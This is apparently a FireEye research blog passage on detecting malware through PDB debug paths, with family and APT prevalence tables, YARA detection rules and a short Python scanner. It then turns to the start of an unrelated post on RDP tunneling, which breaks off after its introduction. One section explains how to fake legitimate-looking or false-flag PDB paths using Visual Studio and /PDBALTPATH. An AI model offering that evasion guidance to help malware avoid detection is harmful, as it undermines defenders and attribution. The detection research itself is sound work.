The keywords typically used to describe malware are strong enough to raise red flags on their own, but there are other common terms or features in PDB paths that may signal that an executable was compiled in a non-enterprise setting. For example, any PDB path containing the “Users” directory tells you that the executable was likely compiled on Windows Vista/7/10 and likely does not represent an “official” or “commercial” development environment. The term “Users” is a much weaker, lower-fidelity signal than “shellcode,” but as we demonstrate below, these terms are indeed present in lots of malware and can be used as weak detection signals.

PDB Path Term Prevalence

Term

Families and Groups Observed

Example PDB Path

Users

ABBEYROAD, AGENTTESLA, ANTFARM, AURORA, BEACON, BLACKDOG, BLACKREMOTE, BLACKSHADESRAT, BREAKDANCE, BROKEYOLK, BUSYFIB, CAMUBOT, CARDCAM, CATNAP, CHILDSPLAY, CITADEL, CROSSWALK, CURVEBALL, DARKCOMET, DARKMOON, DESERTFALCON, DESERTKATZ, DISPKILL, DIZZYLOG, EMOTET, FIDDLEWOOD, FIVERINGS, FLATTOP, FLUXXY, FOOTMOUSE, FORMBOOK, GOLDENCAT, GROK, GZIPDE, HAWKEYE, HIDDENTEAR, HIGHNOTE, HKDOOR, ICEDID, ICEFOG, ISMAGENT, KASPER, KOADIC, LUKEWARM, LUXNET, MOONRAT, NANOCORE, NETGRAIL, NJRAT, NUTSHELL, ONETOFOUR, ORCUSRAT, POISONIVY, POSHC2, QUASARRAT, QUICKHOARD, RADMIN, RANSACK, RAWHIDE, REMCOS, REVENGERAT, RYUK, SANDPIPE, SANDTRAP, SCREENTIME, SEEDOOR, SHADOWTECH, SILENTBYTES, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, SOREGUT, SOURCANDLE, TREASUREHUNT, TRENDCLOUD, TRESOCHO, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, TWINSERVE, UPCONTROL, UPDATESEE, URSNIF, WATERFAIRY, XHUNTER, XRAT, ZEUS

APT5, APT10, APT17, APT33, APT34, APT35, APT36, APT37, APT39, APT40, APT41, FIN6, UNC284, UNC347, UNC373, UNC432, UNC632, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1065, UNC1124, UNC1149, UNC1152, UNC1197, UNC1289, UNC1295, UNC1340, UNC1352, UNC1354, UNC1374, UNC1406, UNC1450, UNC1486, UNC1507, UNC1516, UNC1534, UNC1545, UNC1562

C:\Users\Yousef\Desktop\MergeFiles\Loader v0\Loader\obj\Release\Loader.pdb

ConsoleApplication

WindowsApplication

WindowsFormsApplication

(Visual Studio default project names)

CROSSWALK, DESERTKATZ, DIZZYLOG, FIREPIPE, HIGHPRIEST, HOUDINI, HTRAN, KICKBACK, LUKEWARM, MOONRAT, NIGHTOWL, NJRAT, ORCUSRAT, REDZONE, REVENGERAT, RYUK, SEEDOOR, SLOAD, SOGU, TRICKBOT, TRICKSHOW

APT1, APT34, APT36, FIN6, UNC251, UNC729, UNC1078, UNC1147, UNC1172, UNC1267, UNC1277, UNC1289, UNC1295, UNC1340, UNC1470, UNC1507

D:\Projects\ByPassAV\ConsoleApplication1\
Release\ConsoleApplication1.pdb

New Folder

HOMEUNIX, KASPER, MOONRAT, NANOCORE, NETWIRE, OZONERAT, POISONIVY, REMCOS, SKIDHOOK, TRICKBOT, TURNEDUP, URLZONE

APT18, APT33, APT36, UNC53, UNC74, UNC672, UNC718, UNC1030, UNC1289, UNC1340, UNC1559

c:\Users\USA\Documents\Visual Studio 2008\Projects\New folder (2)\kasper\Release\kasper.pdb

Copy

DESERTFALCON, KASPER, NJRAT, RYUK, SOGU

UNC124, UNC718, UNC757, UNC1065, UNC1215, UNC1225, UNC1289

D:\dll_Mc2.1mc\2.4\2.4.2 xor\zhu\dll_Mc - Copy\Release\shellcode.pdb

Desktop

AGENTTESLA, AVEO, BEACON, BUSYFIB, CHILDSPLAY, COATHOOK, DESERTKATZ, FIVERINGS, FLATTOP, FORMBOOK, GH0ST, GOLDENCAT, HIGHNOTE, HTRAN, IMMINENTMONITOR, KASPER, KOADIC, LUXNET, MOONRAT, NANOCORE, NETWIRE, NUTSHELL, ORCUSRAT, RANSACK, RUNBACK, SEEDOOR, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, TIERNULL, TINYNUKE, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, UPDATESEE, WASHBOARD, WATERFAIRY, XRAT

APT5, APT17, APT26, APT33, APT34, APT35, APT36, APT41, UNC53, UNC276, UNC308, UNC373, UNC534, UNC551, UNC572, UNC672, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1124, UNC1149, UNC1197, UNC1352

C:\Users\Develop_MM\Desktop\sc_loader\
Release\sc_loader.pdb

Figure 11: A selection of common terms in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Exploring Anomalies

Outside of keywords and terms, we discovered a few uncommon (to us) features that may be interesting for future research and detection opportunities.

Non-ASCII Characters

PDB paths with any non-ASCII characters have a high ratio of malware to non-malware in our datasets. The strength of this signal is only because of a data bias in our malware corpus and in our client base. However, if this data bias is consistent, we can use the presence of non-ASCII characters in a PDB path as a signal that an executable merits further scrutiny. In organizations that operate primarily in the world of ASCII, we imagine this will be a strong signal. Below we express logic for this technique in Yara:

rule ConventionEngine_Anomaly_NonAscii
{
    meta:
        author = "@stvemillertime"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,500}[^\x00-\x7F]{1,}[\x00-\xFF]{0,500}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}

Multiple Paths in a Single File

Each compiled program should only have one PDB path. The presence of multiple PDB paths in a single object indicates that the object has subfile executables, from which you may infer that the parent object has the capability to “drop” or “install” other files. While being a dropper or installer is not malicious on its own, having an alternative method of applying those classifications to file objects may be of assistance in surfacing malicious activity. In this example, we can also search for this capability using Yara:

rule ConventionEngine_Anomaly_MultiPDB_Triple
{
    meta:
        author = "@stvemillertime"
    strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #anchor == 3 and #pcre == 3
}

Outside of a Debug Section

When a file is compiled, the entry for the debug information is in the IMAGE_DEBUG_DIRECTORY. Similar to seeing multiple PDB paths in a single file, when we see debug information inside an executable that does not have a debug directory, we can infer that the file has subfile executables and likely has dropper or installer functionality. In this rule, we use Yara’s convenient PE module to check the relative virtual address (RVA) of the IMAGE_DIRECTORY_ENTRY_DEBUG entry; if it is zero, we can presume that there is no debug entry, and thus the presence of a CodeView PDB path indicates that there is a subfile.

import "pe"

rule ConventionEngine_Anomaly_OutsideOfDebug
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
    strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $anchor and $pcre and pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_DEBUG].virtual_address == 0
}

Nulled Out PDB Paths

In the typical CodeView section, we would see the “RSDS” header, the 16-byte GUID, a 4-byte “age” and then a PDB path string. However, we’ve identified a significant number of malware samples where the embedded PDB path area is nulled out. In this example, we can easily see the CodeView debug structure, complete with header, GUID and age, followed by nulls to the end of the segment.

00147880: 52 53 44 53 18 c8 03 4e 8c 0c 4f 46 be b2 ed 9e : RSDS...N..OF....
00147890: c1 9f a3 f4 01 00 00 00 00 00 00 00 00 00 00 00 : ................
001478a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................

There are a few possibilities for how and why a CodeView PDB path may be nulled out, but in the case of intentional tampering to remove toolmarks, the easiest way would be to manually overwrite the PDB path with \x00s. The risk of manually editing and overwriting via hex editor is that doing so is laborious and may introduce other static anomalies such as checksum errors.

The next easiest way is to use a utility designed to wipe debug artifacts from executables. One stellar example of this is “peupdate,” which is designed not only to strip or fabricate the PDB path information, but also to recalculate the checksum and eliminate Rich headers. Below we demonstrate the use of peupdate to clear the PDB path.


Figure 12: Using peupdate to clear the PDB path information from a sample of malware


Figure 13: The peupdate tampered malware as shown in the PEview utility. We see the CodeView section is still present but the PDB path value has been cleared out
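As a rough complement to the ConventionEngine rule for this anomaly, here is a minimal Python sketch (our own illustration, using an assumed 32-byte window for the path region) that flags RSDS records whose PDB path bytes are entirely null:

import sys

def find_nulled_codeview(data, window=32):
    """Yield offsets of RSDS CodeView records whose PDB path bytes are all null."""
    offset = data.find(b"RSDS")
    while offset != -1:
        # Skip the 4-byte "RSDS" header, the 16-byte GUID and the 4-byte age,
        # then examine the region where the PDB path string should begin.
        path_region = data[offset + 24:offset + 24 + window]
        if path_region and not path_region.strip(b"\x00"):
            yield offset
        offset = data.find(b"RSDS", offset + 4)

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        for off in find_nulled_codeview(f.read()):
            print("possible nulled-out PDB path at offset", hex(off))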

PDB Path Anomaly Prevalence

Anomaly

Families and Groups Observed

Examples

Non-Ascii Characters

008S, AGENTTESLA, BADSIGN, BAGELBYTE, BIRDSEED, BLACKCOFFEE, CANNONFODDER, CARDDROP, CEREAL, CHILDSPLAY, COATHOOK, CURVEBALL, DANCEPARTY, DIMWIT, DIZZYLOG, EARTHWORM, EIGHTONE, ELISE, ELKNOT, ENFAL, EXCHAIN, FANNYPACK, FLOWERPOT, FREELOAD, GH0ST, GINGERYUM, GLASSFLAW, GLOOXMAIL, GOLDENCAT, GOOGHARD, GOOGONE, HANDSTAMP, HELLWOOD, HIGHNOON, ICEFOG, ISHELLYAHOO, JAMBOX, JIMA, KRYPTONITE, LIGHTSERVER, LOCKLOAD, LOKIBOT, LOWLIGHT, METASTAGE, NETWIRE, PACMAN, PARITE, POISONIVY, PIEDPIPER, PINKTRIP, PLAYNICE, QUASARRAT, REDZONE, SCREENBIND, SHADOWMASK, SHORTLEASH, SIDEWINDER, SLIMEGRIME, SOGU, SUPERMAN, SWEETBASIL, TEMPFUN, TRAVELNET, TROCHILUS, URSNIF, VIPER, VIPSHELL
APT1, APT2, APT3, APT5, APT6, APT9, APT10, APT14, APT17, APT18, APT20, APT21, APT23, APT24, APT26, APT31, APT33, APT41, UNC20, UNC27, UNC39, UNC53, UNC74, UNC78, UNC1040, UNC1078, UNC1172, UNC1486, UNC156, UNC208, UNC229, UNC237, UNC276, UNC293, UNC366, UNC373, UNC451, UNC454, UNC521, UNC542, UNC551, UNC556, UNC565, UNC584, UNC629, UNC753, UNC794, UNC798, UNC969

I:\RControl\小工具\123\判断加载着\Release\判断加载着.pdb

Multi Path in Single File

AGENTTESLA, BANKSHOT, BEACON, BIRDSEED, BLACKBELT, BRIGHTCOMB, BUGJUICE, CAMUBOT, CARDDROP, CETTRA, CHIPSHOT, COOKIECLOG, CURVEBALL, DARKMOON, DESERTFALCON, DIMWIT, ELISE, EXTRAMAYO, FIDDLELOG, FIDDLEWOOD, FLUXXY, FON, GEARSHIFT, GH0ST, HANDSTAMP, HAWKEYE, HIGHNOON, HIKIT, ICEFOG, IMMINENTMONITOR, ISMAGENT, KASPER, KAZYBOT, LIMITLESS, LOKIBOT, LUMBERJACK, MOONRAT, ORCUSRAT, PLANEDOWN, PLANEPATCH, POSEIDON, POSHC2, PUBNUBRAT, PUPYRAT, QUASARRAT, RABBITHOLE, RATVERMIN, RAWHIDE, REDTAPE, RYUK, SAKABOTA, SAMAS, SEEGAP, SEEKEYS, SKIDHOOK, SOGU, SWEETCANDLE, SWEETTEA, TRAVELNET, TRICKBOT, TROCHILUS, UPCONTROL, UPDATESEE, UROBUROS, WASHBOARD, WHITEWALK, WINERACK, XTREMERAT, ZXSHELL

APT1, APT2, APT17, APT5, APT20, APT21, APT26, APT34, APT36, APT37, APT40, APT41, UNC27, UNC53, UNC218, UNC251, UNC432, UNC521, UNC718, UNC776, UNC875, UNC878, UNC969, UNC1031, UNC1040, UNC1065, UNC1092, UNC1095, UNC1166, UNC1183, UNC1289, UNC1374, UNC1443, UNC1450, UNC1495

Single Sample of TRICKBOT:

D:\MyProjects\spreader\Release\spreader_x86.pdb
D:\MyProjects\spreader\Release\ssExecutor_x86.pdb
D:\MyProjects\spreader\Release\screenLocker_x86.pdb

Outside of Debug Section

ABBEYROAD, AGENTTESLA, BEACON, BLACKSHADESRAT, CHIMNEYDIP, CITADEL, COOKIECLOG, COREBOT, CRACKSHOT, DAYJOB, DIRTCHEAP, DIZZYLOG, DUSTYSKY, EARTHWORM, EIGHTONE, ELISE, EXTRAMAYO, FRONTWHEEL, GELCAPSULE, GH0ST, HAWKEYE, HIGHNOON, KAYSLICE, LEADPENCIL, LOKIBOT, METASTAGE, METERPRETER, MURKYTOP, NUTSHELL, ORCUSRAT, OUTLOOKDUMP, PACMAN, POISONIVY, PLANEPATCH, PONY, PUPYRAT, RATVERMIN, SAKABOTA, SANDTRAP, SEADADDY, SEEDOOR, SHORTLEASH, SOGU, SOULBOT, TERA, TIXKEYS, UPCONTROL, WHIPSNAP, WHITEWALK, XDOOR, XTUNNEL

APT5, APT6, APT9, APT10, APT17, APT22, APT24, APT26, APT27, APT29, APT30, APT34, APT35, APT36, APT37, APT40, APT41, UNC20, UNC27, UNC39, UNC53, UNC69, UNC74, UNC105, UNC124, UNC125, UNC147, UNC213, UNC215, UNC218, UNC227, UNC251, UNC276, UNC282, UNC307, UNC308, UNC347, UNC407, UNC565, UNC583, UNC587, UNC589, UNC631, UNC707, UNC718, UNC775, UNC776, UNC779, UNC842, UNC869, UNC875, UNC924, UNC1040, UNC1080, UNC1148, UNC1152, UNC1225, UNC1251, UNC1428, UNC1450, UNC1486, UNC1575

Nulled Out PDB Paths

HIGHNOON, SANNY, PHOTO, TERA, SOYSAUCE, VIPER, FIDDLEWOOD, BLACKDOG, FLUSHSHOW, NJRAT, LONGCUT

APT41, UNC776, UNC229, UNC177, UNC1267, UNC878, UNC1511

Figure 14: A selection of anomalies in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Outliers, Oddities, Exceptions and Other Shenanigans

The internet is a weird place, and at a big enough scale, you end up seeing things that you never thought you would. Things that deviate from the norms, things that shirk the standards, things that utterly defy explanation. We expect PDB paths to look a certain way, but we’ve run across several samples that did not, and we’re not always sure why. Many of the samples below may be the results of errors, corruption, obfuscation, or various forms of intentional manipulation. We’re demonstrating them here to show that if you are attempting PDB path parsing or detection, you need to understand the variety of paths in the wild and prepare for shenanigans galore. Each of these examples is from a confirmed malware sample.

Shenanigan

Example PDB Paths

Unicode error

Text Path: C^\Users\DELL\Desktop\interne.2.pdb

Raw Path: 435E5C55 73657273 5C44454C 4C5C4465 736B746F 705C696E 7465726E 6598322E 706462

Text Path: Cj\Users\hacker messan\Deskto \Server111.pdb

Raw Path: 436A5C55 73657273 5C686163 6B657220 6D657373 616E5C44 65736B74 6FA05C53 65727665 72313131 2E706462

Nothing but space

Text Path:                                                         

Full Raw: 52534453 7A7F54BF BAC9DE45 89DC995F F09D2327 0A000000 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202000

Spaced out

Text Path: D:\                                 .pdb

Full Raw: 52534453 A7FBBBFE 5C41A545 896EF92F 71CD1F08 01000000 443A5C20 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 2E706462 00

Nothin’ but null

Text Path: <null bytes only>

Full Raw: 52534453 97272434 3BACFA42 B2DAEE99 FAB00902 01000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000

Random characters

Text Path: Lmd9knkjasdLmd9knkjasLmd9knkAaGc.pdb

Random path

Text Path: G:\givgLxNzKzUt\TcyaxiavDCiu\bGGiYrco\QNfWgtSs\auaXaWyjgmPqd.pdb

Word soup

Text Path: c:\Busy\molecule\Blue\Valley\Steel\King\enemy\Himyard.pdb

Mixed doubles

Text Path: C::\\QQQQQQQQ\VVVVVVVVVVVVVVVVV.pdb

Short

Text Path: 1.pdb

No .pdb

Text Path: a

Full Raw: 52534453 ED86CA3D 6C677946 822E668F F48B0F9D 01000000 6100

Long and weird with repeated character

Text Path: ªªªªªªªªªªªªªªªªªªªªtinjs\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaae.pdb

Full Raw: 52534453 DD947C2F 6B32544C 8C3ACB2E C7C39F45 01000000 AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA 74696E6A 735C6161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 652E7064 6200

No idea

Text Path: n:.Lí..×ÖòÒ.

Full Raw: 52534453 5A2D831D CB4DCF1E 4A05F51B 94992AA0 B7CFEE32 6E3AAD4C ED1A1DD7 D6F2D29E 00

Forward slashes and no drive letter

Text Path: /Users/user/Documents/GitHub/SharpWMI/SharpWMI/obj/Debug/SharpWMI.pdb

Network share

Text path:

\\vmware-host\shared folders\Decrypter\Decrypter\obj\Release\Decrypter.pdb

Non-Latin drive letter

We haven’t seen this yet, but it’s only a matter of time until you can have an emoji as a drive letter.

Figure 15: A selection of PDB paths shenanigans with examples

Betwixt Nerf Herders and Elite Operators

There are many differences between apex threat actors and the rest, even if all successfully perform intrusion operations. Groups that exercise good OPSEC in some campaigns may have bad OPSEC in others. APT36 has hundreds of leaked PDB paths, whereas APT30 has a minimal PDB path footprint, while APT38 is a ghost.

When PDB paths are present, the types of keywords, terms, and other string items present in PDB paths are all on a spectrum of professionalism and sophistication. On one end we’re seeing “njRAT-FUD 0.3” and “1337 h4ckbot” and on the other end we’re seeing “minidionis” and “msrstd”.

The trendy critique of string-based detection goes something like “advanced adversaries would never act so carelessly; they’ll obfuscate and evade your naïve and brittle signatures.” In the tables above for PDB path keywords, terms and anomalies, we think we’ve shown that bona fide APT/FIN groups, state-sponsored adversaries, and the best-of-the-best attackers do sometimes slip up and give us an opportunity for detection.

Let’s call out some specific examples from boutique malware from some of the more advanced threat groups.

Equation Group

Some Equation Group samples show full PDB paths that indicate that some of the malware was compiled in debug mode on workstations or virtual machines used for development.

Other Equation Group samples have partially qualified PDB paths that represent something less obvious. These standalone PDB names may reflect a more tailored, multi-developer environment, where it wouldn’t make sense to specify a fully qualified PDB path for a single developer system. Instead, the linker is instructed to write only the PDB file name in the built executable. Still, these PDB paths are unique to their malware samples:

  • tdip.pdb
  • volrec.pdb
  • msrstd.pdb

Regin

Deeming a piece of malware a “backdoor” is increasingly passé. Calling a piece of malware an “implant” is the new hotness, and the general public may be adopting this nouveau nomenclature long after purported Western governments. In this component of the Regin platform, we see a developer that was way ahead of the curve:

APT29

Let’s not forget APT29, whose brazen worldwide intrusion sprees often involve pieces of creative, elaborate, and stealthy malware. APT29 is amongst the better groups at staying quiet, but in thousands of pieces of malware, these normally disciplined operators did leak a few PDB paths such as:

  • c:\Users\developer\Desktop\unmodified_netimplant\minidionis\minidionis\obj\Debug\minidionis.pdb
  • C:\Projects\nemesis-gemina\nemesis\bin\carriers\ezlzma_x86_exe.pdb

Even when the premier outfits don’t use the glaring keywords, there may still be some string terms, anomalies and unique values present in PDB paths that each represent an opportunity for detection.

ConventionEngine

We extract and index all PDB paths from all executables so we can easily search and spelunk through our data. But not everyone has it that easy, so we cranked out a quick collection of nearly 100 Yara rules for PDB path keywords, terms and anomalies that we believe researchers and analysts can use to detect evil. We named this collection of rules “ConventionEngine” as a nod to the industry joke that security vendors love to tout their elite detection “engines,” when behind the green curtain they are often just a spaghetti mess of scripts and signatures, which is absolutely how this started.

Instead of tight production “signatures,” you can think of these as “weak signals” or “discovery rules” that are meant to build haystacks of varying size and fidelity for analysts to hunt through. Those rules with a low signal-to-noise ratio (SNR) could be fed to automated systems for logging or contextualization of file objects, whereas rules with a higher SNR could be fed directly to analysts for review or investigation.

Our adversaries are human. They err. And when they do, we can catch them. We are pleased to release ConventionEngine rules for anyone to use in that effort. Together these rules cover samples from over 300 named malware families, hundreds of unnamed malware families, 39 different APT and FIN threat groups, and over 200 UNC (uncategorized) groups of activity.

We hope you can use these rules as templates, or as starting points for further PDB path detection ideas. There’s plenty of room for additional keywords, terms, and anomalies. Be advised, whether for detection or hunting or merely for context, you will need to tune and add additional logic to each of these rules to make the size of the resulting haystacks appropriate for your purposes, your operations and the technology within your organization. When judiciously implemented, we believe these rules can enrich analysis and detect things that are missed elsewhere.

PDB Paths for Intelligence Teams

Gettin' Lucky with APT31

During an incident response investigation, we found an APT31 account on GitHub being used for staging malware files and for malware communications. The intrusion operators using this account weren’t shy about putting full code packages right into the repositories, and we were able to recover actual PDB files associated with multiple malware ecosystems. Using the actual PDB files, we were able to see the full directory paths of the raw malware source code, representing a considerable intelligence gain about the malware’s original development environment. We used what we found in the PDB files themselves to search for other files related to this malware author.

Finding Malware Source Code Using PDBs

Malware PDBs themselves are easier to find than one may think. Sure, sometimes the authors are kind enough to leave everything up on Github. But there are some other occasions too: sometimes malware source code will get inadvertently flagged by antivirus or endpoint detection and response (EDR) agents; sometimes malware source code will be left in open directories; and sometimes malware source code will get uploaded to the big malware repositories.

You can find malware source code by looking for things like Visual Studio solution files, or simply with Yara rules looking for PDB files in archives that have some non-zero detection rate or other metadata that raises the likelihood that some component in the archive is indeed malicious.

rule PDB_Header_V2
{
    meta:
        author = "@stvemillertime"
        description = "This looks for PDB files based on headers."
    strings:
        //$string = "Microsoft C/C++ program database 2.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 70726F67 72616D20 64617461 62617365 20322E30 300D0A}
    condition:
        $hex at 0
}

rule PDB_Header_V7
{
    meta:
        author = "@stvemillertime"
        description = "This looks for PDB files based on headers."
    strings:
        //$string = "Microsoft C/C++ MSF 7.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 4D534620 372E3030}
    condition:
        $hex at 0
}

PDB Paths for Offensive Teams

FireEye has confirmed individual attribution to bona fide threat actors and red teamers based in part on leaked PDB paths in malware samples. The broader analyst community often uses PDB paths for clustering and pivoting to related malware families and while building a case for attribution, tracking, or pursuit of malware developers. Naturally, red team and offensive operators should be aware of the artifacts that are left behind during the compilation process and abstain from compiling with symbol generation enabled – basically, remember to practice good OPSEC on your implants. That said, there is an opportunity for creating artificial PDB paths should one wish to intentionally introduce this artifact.

Making PDB Paths Appear More “Legitimate”

One notable differentiator between malware and non-malware is that malware is typically not developed in an “enterprise” or “commercial” software development setting. The difference here is that in large development settings, software engineers are working on big projects together through productivity tools, and the software is constantly updated and rebuilt through automated “continuous integration” (CI) or “continuous delivery” (CD) suites such as Jenkins and TeamCity.  This means that when PDB paths are present in legitimate enterprise software packages, they often have toolmarks showing their compile path on a CI/CD build server.

Here are some examples of PDB paths of legitimate software executables built in a CI/CD environment:

  • D:\Jenkins\workspace\QA_Build_5_19_ServerEx_win32\_buildoutput\ServerEx\Win32\Release\_symbols\keysvc.pdb
  • D:\bamboo-agent-home\xml-data\build-dir\MC-MCSQ1-JOB1\src\MobilePrint\obj\x86\Release\MobilePrint.pdb
  • C:\TeamCity\BuildAgent\work\714c88d7aeacd752\Build\Release\cs.pdb

We do not discount the fact that some malware developers are using CI/CD build environments. We know that some threat actors and malware authors are indeed adopting contemporary enterprise development processes, but malware PDBs like this example are extraordinarily rare:

  • c:\users\builder\bamboo~1\xml-data\build-~1\trm-pa~1\agent\window~1\rootkit\Output\i386\KScan.pdb

Specifying Custom PDB Paths in Visual Studio

Specifying a custom path for a PDB file is not uncommon in the development world. An offensive or red team operator may wish to specify a fake PDB path and can do so easily using compiler linking options.

As our example malware author “smiller” learns and hones their tradecraft, they may adopt a stealthier approach and choose to include one of those more “legitimate” looking PDB paths in new malware compilations.

Take smiller’s example malware project located at the path:

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\


Figure 16: hellol.cpp code shown in Visual Studio with debug build information

This project, compiled in the default Debug configuration, places both the hellol.exe file and the hellol.pdb file under

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\Debug\


Figure 17: hellol.exe and hellol.pdb, compiled by debug configuration default into its resident folder

It’s easy to change the properties of this project and manually specify the generation path of the PDB file. From the Visual Studio menu bar, select Project > Properties, then in the side pane select Linker > Debugging and fill in the option box for “Generate Program Database File.” This option accepts Visual Studio macros, so there is plenty of flexibility for scripting and creating custom build configurations for falsifying or randomizing PDB paths.


Figure 18: hellol project Properties showing defaults for the PDB path


Figure 19: hellol project Properties now showing a manually specified path for the (fake) PDB path

When we examine the raw, rebuilt hellol.exe, we can see at the byte level that the linker has included debug information in the executable specifying our designated PDB path, which of course is not real. If building at the command line, you could instead specify /PDBALTPATH, which embeds a PDB file name that does not rely on the file structure of the build computer.


Figure 20: Rebuilt hellol.exe as seen through the PEview utility, which shows us the fake PDB path in the IMAGE_DEBUG_TYPE_CODEVIEW directory of the executable
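For example, a command-line build along these lines would embed an arbitrary, CI/CD-looking PDB path in the executable without changing where the actual PDB file is written (the /PDBALTPATH linker option is real; the path shown is purely illustrative):

cl.exe /Zi hellol.cpp /link /PDBALTPATH:D:\Jenkins\workspace\QA_Build\Release\_symbols\hellol.pdb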

An offensive or red team operator could intentionally include a PDB path in a piece of malware, making the executable appear to be compiled on a CI/CD server which could help the malware fly under the radar. Additionally, an operator could include a PDB path or strings associated with a known malware family or threat group to confound analysts. Why not throw in a small homage to one of your favorite malware operators or authors, such as the infamous APT33 persona xman_1365_x? Or perhaps throw in a “\Homework\CS1101\” to make the activity seem more academic? For whatever reason, if there is PDB manipulation to be done, it is generally doable with common software development tools.

The Glory and the Nothing of a (Malware) Name

In the context of PDB paths and malware author naming conventions, it is important to acknowledge the interdependent (and often circular) nature of “offense” and “defense.” Which came first, a defender calling a piece of malware a “trojan” or a malware author naming their code project a “trojan”? Some malware is inspired by prior work. An author names a code project “MIMIKATZ”, and years later there are hundreds of related projects and scripts with derivative names.

Although definitions may vary, we see that both the offensive and defensive sides characterize the functionality or role of a piece of malware using much of the same vernacular and inspiration. We suspect this began with “virus” and that the array of granular, descriptive terms will continue to grow as public discourse advances the malware taxonomy. Who would have suspected that how we talk about malware would ultimately lead to the possibility of detecting it? After all, would a rootkit by any other name be as evil? Somewhere, a scholar is beaming with wonder at the intersection of malware and linguistics.

Conclusions

If by now you’re thinking this is all kind of silly, don’t worry, you’re in good company. PDB paths are indeed a wonky attribute of a file. The mere presence of these paths in an executable is by no means evil, yet when these paths are present in pieces of malware, they usually represent acts of operational indiscretion. The idea of detecting malware based on PDB paths is kind of like detecting a robber based on what type of hat a person is wearing, if they’re wearing one at all.

We have been historically successful in using PDB paths mostly as an analytical pivot, to help us cluster malware families and track malware developers. When we began to study PDB paths holistically, we noticed that many malware authors were using many of the same naming conventions for their folders and project files. They were naming their malware projects after the functionality of the malware itself, and routinely labeled their projects with unique, descriptive language.

We found that many malware authors and operators leaked PDB paths that described the functionality of the malware itself and gave us insight into the development environment. Furthermore, outside of the descriptors of the malware development files and environment, when PDB paths are present, we identified anomalies that help us surface files that are more likely to be circumstantially interesting. There is room for red team and offensive operators to improve their tradecraft by falsifying PDB paths for purposes of stealth or razzle-dazzle.

We remain optimistic that we can squeeze some juice from PDB paths when they are present. A survey of about 2200 named malware families (including all samples from 41 APT and 10 FIN groups and a couple million other uncategorized executables) shows that PDB paths are present in malware about five percent of the time. Imagine if you could have a detection “backup plan” for five plus percent of malware, using a feature that is itself inherently non-malicious. That’s kind of cool, right?

Future Work on Scaling PDB Path Classification

Our ConventionEngine rule pack for PDB path keyword, term and anomaly detection has been fun and found tons of malware that would have otherwise been missed. But there are a lot of PDB paths in malware that do not have such obvious keywords, and so our manual, cherry-picking, and extraordinarily laborious approach doesn’t scale.

Stay tuned for the next part of our blog series! In Part Deux, we explore scalable solutions for PDB path feature generalization and approaches for classification. We believe that data science approaches will better enable us to surface PDB paths with unique and interesting values and move towards a classification solution without any rules whatsoever.

Recommended Reading and Resources

Inspiring Research
Debugging and Symbols
Debug Directory and CodeView
Debugging and Visual Studio
PDB File Structure
PDB File Tools
ConventionEngine Rules

Bypassing Network Restrictions Through RDP Tunneling

Remote Desktop Services is a component of Microsoft Windows that is used by various companies for the convenience it offers systems administrators, engineers and remote employees. On the other hand, Remote Desktop Services, and specifically the Remote Desktop Protocol (RDP), offers this same convenience to remote threat actors during targeted system compromises. When sophisticated threat actors establish a foothold and acquire ample logon credentials, they may switch from backdoors to using direct RDP sessions for remote access. When malware is removed from the equation, intrusions become increasingly difficult to detect.

RDPing Against the Rules

Threat actors continue to prefer RDP for the stability and functionality advantages over non-graphical backdoors, which can leave unwanted artifacts on a system. As a result, FireEye has observed threat actors using native Windows RDP utilities to connect laterally across systems in compromised environments. Historically, non-exposed systems protected by a firewall and NAT rules were generally considered not to be vulnerable to inbound RDP attempts; however, threat actors have increasingly started to subvert these enterprise controls with the use of network tunneling and host-based port forwarding.

Network tunneling and port forwarding take advantage of firewall "pinholes" (ports not protected by the firewall that allow an application access to a service on a host in the network protected by the firewall) to establish a connection with a remote server blocked by a firewall. Once a connection has been established to the remote server through the firewall, the connection can be used as a transport mechanism to send or "tunnel" local listening services (located inside the firewall) through the firewall, making them accessible to the remote server (located outside the firewall), as shown in Figure 1.


Figure 1: Enterprise firewall bypass using RDP and network tunneling with SSH as an example

Inbound RDP Tunneling

